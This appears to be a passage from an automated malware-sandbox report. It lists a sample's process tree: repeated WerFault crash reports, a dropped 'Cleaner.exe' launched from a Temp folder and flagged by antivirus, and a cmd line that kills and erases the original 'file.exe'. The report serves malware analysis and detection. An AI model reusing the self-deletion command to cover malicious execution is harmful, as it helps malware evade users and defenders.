                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5464 -s 724
                                                      Imagebase:0x2a0000
                                                      File size:434592 bytes
                                                      MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      General

                                                      Target ID:13
                                                      Start time:17:20:00
                                                      Start date:03/10/2022
                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5464 -s 776
                                                      Imagebase:0x2a0000
                                                      File size:434592 bytes
                                                      MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      General

                                                      Target ID:15
                                                      Start time:17:20:04
                                                      Start date:03/10/2022
                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5464 -s 896
                                                      Imagebase:0x2a0000
                                                      File size:434592 bytes
                                                      MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      General

                                                      Target ID:17
                                                      Start time:17:20:07
                                                      Start date:03/10/2022
                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5464 -s 908
                                                      Imagebase:0x2a0000
                                                      File size:434592 bytes
                                                      MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      General

                                                      Target ID:19
                                                      Start time:17:20:10
                                                      Start date:03/10/2022
                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5464 -s 1156
                                                      Imagebase:0x2a0000
                                                      File size:434592 bytes
                                                      MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language

                                                      General

                                                      Target ID:21
                                                      Start time:17:20:35
                                                      Start date:03/10/2022
                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5464 -s 1228
                                                      Imagebase:0x2a0000
                                                      File size:434592 bytes
                                                      MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language

                                                      General

                                                      Target ID:22
                                                      Start time:17:20:37
                                                      Start date:03/10/2022
                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\user~1\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exe
                                                      Imagebase:0xa60000
                                                      File size:232960 bytes
                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language

                                                      General

                                                      Target ID:23
                                                      Start time:17:20:37
                                                      Start date:03/10/2022
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff6edaf0000
                                                      File size:625664 bytes
                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language

                                                      General

                                                      Target ID:24
                                                      Start time:17:20:37
                                                      Start date:03/10/2022
                                                      Path:C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Users\user~1\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exe"
                                                      Imagebase:0x143733a0000
                                                      File size:3947920 bytes
                                                      MD5 hash:04514BD4962F7D60679434E0EBE49184
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:.Net C# or VB.NET
                                                      Antivirus matches:
                                                      • Detection: 29%, ReversingLabs

                                                      General

                                                      Target ID:28
                                                      Start time:17:21:07
                                                      Start date:03/10/2022
                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5464 -s 1292
                                                      Imagebase:0x2a0000
                                                      File size:434592 bytes
                                                      MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language

                                                      General

                                                      Target ID:29
                                                      Start time:17:21:13
                                                      Start date:03/10/2022
                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\System32\cmd.exe" /c taskkill /im "file.exe" /f & erase "C:\Users\user\Desktop\file.exe" & exit
                                                      Imagebase:0xa60000
                                                      File size:232960 bytes
                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language

                                                      General

                                                      Target ID:30
                                                      Start time:17:21:15
                                                      Start date:03/10/2022
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff6edaf0000
                                                      File size:625664 bytes
                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language

                                                      General

                                                      Target ID:31
                                                      Start time:17:21:15
                                                      Start date:03/10/2022
                                                      Path:C:\Windows\SysWOW64\taskkill.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:taskkill /im "file.exe" /f
                                                      Imagebase:0x900000
                                                      File size:74752 bytes
                                                      MD5 hash:15E2E0ACD891510C6268CB8899F2A1A1
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language

                                                      General

                                                      Target ID:32
                                                      Start time:17:21:16
                                                      Start date:03/10/2022
                                                      Path:C:\Windows\System32\WerFault.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\WerFault.exe -u -p 2380 -s 1576
                                                      Imagebase:0x7ff653d80000
                                                      File size:494488 bytes
                                                      MD5 hash:2AFFE478D86272288BBEF5A00BBEF6A0
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:.Net C# or VB.NET

                                                      General

                                                      Target ID:33
                                                      Start time:17:21:27
                                                      Start date:03/10/2022
                                                      Path:C:\Windows\System32\WerFault.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\WerFault.exe -u -p 2380 -s 1576
                                                      Imagebase:0x7ff653d80000
                                                      File size:494488 bytes
                                                      MD5 hash:2AFFE478D86272288BBEF5A00BBEF6A0
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language

                                                      Disassembly

                                                      No disassembly